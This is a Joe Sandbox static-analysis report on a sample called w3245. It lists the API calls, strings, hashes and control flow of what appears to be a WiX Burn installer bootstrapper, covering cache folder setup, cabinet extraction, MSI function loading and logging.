                                                                                                                                                                    • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                    • API String ID: 32694325-3635313340

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 854 c982ba-c98303 call caf8e0 857 c98309-c98317 GetCurrentProcess call cc0879 854->857 858 c9847c-c98489 call c82195 854->858 861 c9831c-c98329 857->861 863 c98498-c984aa call cae06f 858->863 864 c9848b 858->864 865 c9832f-c9833e GetWindowsDirectoryW 861->865 866 c983b7-c983c5 GetTempPathW 861->866 867 c98490-c98497 call cc0237 864->867 869 c98378-c98389 call c8337f 865->869 870 c98340-c9834a GetLastError 865->870 871 c983ff-c98411 UuidCreate 866->871 872 c983c7-c983d1 GetLastError 866->872 867->863 892 c9838b-c98390 869->892 893 c98395-c983ab call c836a3 869->893 878 c9834c-c98355 870->878 879 c98357 870->879 875 c9841a-c9842f StringFromGUID2 871->875 876 c98413-c98418 871->876 880 c983de 872->880 881 c983d3-c983dc 872->881 884 c9844d-c9846e call c81f13 875->884 885 c98431-c9844b call c83821 875->885 876->867 878->879 886 c98359 879->886 887 c9835e-c98373 call c83821 879->887 888 c983e0 880->888 889 c983e5-c983fa call c83821 880->889 881->880 902 c98470-c98475 884->902 903 c98477 884->903 885->867 886->887 887->867 888->889 889->867 892->867 893->871 904 c983ad-c983b2 893->904 902->867 903->858 904->867
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00C85489), ref: 00C98310
                                                                                                                                                                      • Part of subcall function 00CC0879: OpenProcessToken.ADVAPI32(?,00000008,?,00C853BD,00000000,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC0897
                                                                                                                                                                      • Part of subcall function 00CC0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC08A1
                                                                                                                                                                      • Part of subcall function 00CC0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00C9769D,00000000), ref: 00CC092B
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00C98336
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C98340
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00C983BD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C983C7
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00C98406
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to concat Temp directory on windows path for working folder., xrefs: 00C983AD
                                                                                                                                                                    • cache.cpp, xrefs: 00C98364, 00C983EB, 00C9843C
                                                                                                                                                                    • Failed to copy working folder path., xrefs: 00C9848B
                                                                                                                                                                    • Failed to create working folder guid., xrefs: 00C98413
                                                                                                                                                                    • Failed to convert working folder guid into string., xrefs: 00C98446
                                                                                                                                                                    • %ls%ls\, xrefs: 00C98458
                                                                                                                                                                    • Failed to get windows path for working folder., xrefs: 00C9836E
                                                                                                                                                                    • Failed to get temp path for working folder., xrefs: 00C983F5
                                                                                                                                                                    • Failed to append bundle id on to temp path for working folder., xrefs: 00C98470
                                                                                                                                                                    • Failed to ensure windows path for working folder ended in backslash., xrefs: 00C9838B
                                                                                                                                                                    • Temp\, xrefs: 00C98395
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                    • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 00CA111D
                                                                                                                                                                    • CoUninitialize.COMBASE ref: 00CA1398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp

                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C84303
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(000000D0,?,?,00C85266,?,?,00000000,?,?), ref: 00C8430C
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00C85266,?,?,00000000,?,?), ref: 00C84352
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C8435C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C84370
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00C85266,?,?,00000000,?,?), ref: 00C84380
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00C85266,?,?,00000000,?,?), ref: 00C843D0
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C843DA
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00C85266,?,?,00000000,?,?), ref: 00C843EE
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00C85266,?,?,00000000,?,?), ref: 00C843FE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                    • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp

                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 00C9E7FF
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00C9E82B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C9E836
                                                                                                                                                                    • CreateWindowExW.USER32(00000080,00CD9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 00C9E89D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00C9E8A7
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 00C9E945
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                    • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445), ref: 00C8C2D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C2E7
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?), ref: 00C8C336
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C33C
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C33F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C349
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C39B
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00C8C3A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                    • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 2619879409-373955632
                                                                                                                                                                    • Opcode ID: 9f1c2c7dbcc6298559054925578cac86110d452c0ed3e0cdcc42b3fa86d57976
                                                                                                                                                                    • Instruction ID: 789858a1b2a1bfe802f633c2648e8b58bcb3549ad47812c5e49f29d4de4d6a3f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f1c2c7dbcc6298559054925578cac86110d452c0ed3e0cdcc42b3fa86d57976
                                                                                                                                                                    • Instruction Fuzzy Hash: B741D676140201ABDB20AF59CD89F5B3BA6EB85724F21842DF914DB291D731CC02DB74

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C83838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83877
                                                                                                                                                                      • Part of subcall function 00C83838: GetLastError.KERNEL32 ref: 00C83881
                                                                                                                                                                      • Part of subcall function 00CC4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00CC4A9D
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00CC2B41
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00CC2B61
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00CC2B81
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00CC2BA1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00CC2BC1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00CC2BE1
                                                                                                                                                                    • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00CC2C01
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                    • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                    • API String ID: 2510051996-1735120554
                                                                                                                                                                    • Opcode ID: 802db75e7d27fbe6117bcc274a44e3f8b38d6a2067a61f799671202905e76883
                                                                                                                                                                    • Instruction ID: 85e4d14120e45c39c182e65a86232668f5fabc4692b8be87f61c654258b729e1
                                                                                                                                                                    • Opcode Fuzzy Hash: 802db75e7d27fbe6117bcc274a44e3f8b38d6a2067a61f799671202905e76883
                                                                                                                                                                    • Instruction Fuzzy Hash: 6331CEB096029AEBDB1A9F21ED82B7F7BB8F720748F00113AF4145A270E7B50D45AF54

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00CC3609,00000000,?,00000000), ref: 00CC3069
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CAC025,?,00C85405,?,00000000,?), ref: 00CC3075
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00CC30B5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CC30C1
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 00CC30CC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CC30D6
                                                                                                                                                                    • CoCreateInstance.OLE32(00CEB6B8,00000000,00000001,00CCB818,?,?,?,?,?,?,?,?,?,?,?,00CAC025), ref: 00CC3111
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00CC31C0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                    • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                    • API String ID: 2124981135-499589564
                                                                                                                                                                    • Opcode ID: f294670152d453589c55cb8e578ef0ffecb49eef542c2076cf35dcaa8f2e0091
                                                                                                                                                                    • Instruction ID: cf23d73bdc25b6ff62436a6dd5b883297c733d86a11297521fd93cdb98711cf7
                                                                                                                                                                    • Opcode Fuzzy Hash: f294670152d453589c55cb8e578ef0ffecb49eef542c2076cf35dcaa8f2e0091
                                                                                                                                                                    • Instruction Fuzzy Hash: A941E272B01295AFCB259BA9DC45FAEB7B8EF44750F15806CE911EB240CB71DF408B90

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00CBFCD6
                                                                                                                                                                    • GetProcAddress.KERNEL32(SystemFunction041), ref: 00CBFCE8
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 00CBFD2B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00CBFD3F
                                                                                                                                                                    • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00CBFD77
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00CBFD8B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$ErrorLast
                                                                                                                                                                    • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$`+?s$cryputil.cpp
                                                                                                                                                                    • API String ID: 4214558900-776468437
                                                                                                                                                                    • Opcode ID: aaa4d235940a3db6f7180b428a739a8e4805bb7ddad92f81973985c88bb6013e
                                                                                                                                                                    • Instruction ID: 54e935cf7006dc5b1d4342d1865e609ddf601b59e750214d3f68cb1c936216c1
                                                                                                                                                                    • Opcode Fuzzy Hash: aaa4d235940a3db6f7180b428a739a8e4805bb7ddad92f81973985c88bb6013e
                                                                                                                                                                    • Instruction Fuzzy Hash: 0521A7329423B2A7C7319F76AD49BAF6990AB10F91F020139FD10AF3B1E7608C41DAD4
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,00C8C3EB,?,00000000,?,00C8C47F), ref: 00CA1778
                                                                                                                                                                    • GetLastError.KERNEL32(?,00C8C3EB,?,00000000,?,00C8C47F,00C85405,?,?,00C85445,00C85445,00000000,?,00000000), ref: 00CA1781
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorEventLast
                                                                                                                                                                    • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 545576003-938279966
                                                                                                                                                                    • Opcode ID: 9755662ab83996b624e96fdb0c3ebe9675084566e3d3ae3c145856af3080a2ef
                                                                                                                                                                    • Instruction ID: 3f64b1336c2aa5200b59d8c7a0b8c36f5135ac79cfcf6b9e82abad2959fcef7f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9755662ab83996b624e96fdb0c3ebe9675084566e3d3ae3c145856af3080a2ef
                                                                                                                                                                    • Instruction Fuzzy Hash: 6521E577E4163776D32126A58D46F2B6A9CEB01BB8F160226FE10FB2C1EB54DC0086E5
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 00CA08F2
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00CA090A
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 00CA090F
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00CA0912
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00CA091C
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 00CA098B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00CA0998
                                                                                                                                                                    Strings
                                                                                                                                                                    • <the>.cab, xrefs: 00CA08EB
                                                                                                                                                                    • Failed to open cabinet file: %hs, xrefs: 00CA09C9
                                                                                                                                                                    • cabextract.cpp, xrefs: 00CA0940, 00CA09BC
                                                                                                                                                                    • Failed to add virtual file pointer for cab container., xrefs: 00CA0971
                                                                                                                                                                    • Failed to duplicate handle to cab container., xrefs: 00CA094A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                    • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                                                                                                                                    • API String ID: 3030546534-3446344238
                                                                                                                                                                    • Opcode ID: a586adadee65919cdd7c0d300f9ef51cf9737db2639ef2cafd9632207f575121
                                                                                                                                                                    • Instruction ID: afcca168d272dfcd227c8aa47ffc7412ad016a15e9a062168d194bae6ac08824
                                                                                                                                                                    • Opcode Fuzzy Hash: a586adadee65919cdd7c0d300f9ef51cf9737db2639ef2cafd9632207f575121
                                                                                                                                                                    • Instruction Fuzzy Hash: 2931EB72941236BBEB215BA5CC49F9FBE6CEF057A4F210126FE04B7251D7209D00D6E5
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C93AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00C93FB5,feclient.dll,?,00000000,?,?,?,00C84B12), ref: 00C93B42
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00C84B12,?,?,00CCB488,?,00000001,00000000,00000000), ref: 00C9404C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseSleep
                                                                                                                                                                    • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                                    • API String ID: 2834455192-2673269691
                                                                                                                                                                    • Opcode ID: 1f1c35345fcadae0153f3712ade925bc7fddba957d64b0274ec109a64e12ecef
                                                                                                                                                                    • Instruction ID: 6d20c8475968f3f877fca653176b17fc3444a73db6df511f7bef1f8ae71f82e4
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f1c35345fcadae0153f3712ade925bc7fddba957d64b0274ec109a64e12ecef
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B61D471A00256BBDF299F64CC4EF7A77A9EF10340B14416AFD14DB240EB70EE91A791
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000001,?,00000000,00C85445,00000006,?,00C882B9,?,?,?,00000000,00000000,00000001), ref: 00C86DC8
                                                                                                                                                                      • Part of subcall function 00C856A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00C86595,00C86595,?,00C8563D,?,?,00000000), ref: 00C856E5
                                                                                                                                                                      • Part of subcall function 00C856A9: GetLastError.KERNEL32(?,00C8563D,?,?,00000000,?,?,00C86595,?,00C87F02,?,?,?,?,?), ref: 00C85714
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00C882B9), ref: 00C86F59
                                                                                                                                                                    Strings
                                                                                                                                                                    • Setting numeric variable '%ls' to value %lld, xrefs: 00C86EFA
                                                                                                                                                                    • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00C86F6B
                                                                                                                                                                    • Unsetting variable '%ls', xrefs: 00C86F15
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 00C86DE3
